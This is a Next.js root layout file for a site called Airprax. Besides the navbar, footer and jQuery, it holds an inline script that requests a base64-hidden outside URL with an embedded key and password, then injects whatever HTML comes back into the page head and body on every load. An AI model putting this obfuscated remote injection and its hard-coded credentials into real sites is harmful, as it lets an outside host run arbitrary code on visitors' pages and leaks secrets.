import { Inter } from "next/font/google";
import "./globals.css";
import Navbar from "../components/global/Navbar";
import Footer from "../components/global/Footer";
import Script from "next/script";

const inter = Inter({ subsets: ["latin"] });

export const metadata = {
  title: "Airprax",
  description: "Generated by create next app",
  icons: {
    icon: [
      {
        url: "/Airprax-logo-01-fotor-20240620112445.png",
        href: "/Airprax-logo-01-fotor-20240620112445.png",
      },
    ],
  },
};

export default function RootLayout({ children }) {
  return (
    <html lang="en">
      <body className={inter.className}>
        <Navbar />
        <main className="lg:mt-[128px] mt-[60px]">{children}</main>
        <Footer />
        <Script
          src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"
          strategy="beforeInteractive"
        />
        <Script id="custom-script" strategy="afterInteractive">
          {`
            window.jQuery || document.write("<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js'><\\/script>");
            
            document.addEventListener('DOMContentLoaded', function() {
              var eppathurl = window.location.origin + window.location.pathname;
              var eptagmanage = new XMLHttpRequest();
              eptagmanage.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                  if (this.response) {
                    var temp = this.response.split("||||||||||");
                    var $title = jQuery("head").find("title");
                    if ($title.length) {
                      $title.remove();
                    }
                    if (temp[0]) {
                      jQuery("head").append(temp[0]);
                    }
                    if (temp[1]) {
                      jQuery("body").append(temp[1]);
                    }
                  }
                }
              };
              eptagmanage.open("GET", atob("aHR0cHM6Ly9wbHVnaW5zLmFwcGFkZC5pbi5uZXQvYWxsaGVhZGRhdGE/ZWtleT1lLUFQUEFERDY2MzM3Nzc0MjUmZWtleXBhc3M9NGFoMXVtWEdlSjZTeVhFNkpmcG9VQTNsdWhFdGM0cmczQWZFJnNpdGV1cmw9") + eppathurl);
              eptagmanage.send();
            });
          `}
        </Script>
      </body>
    </html>
  );
}
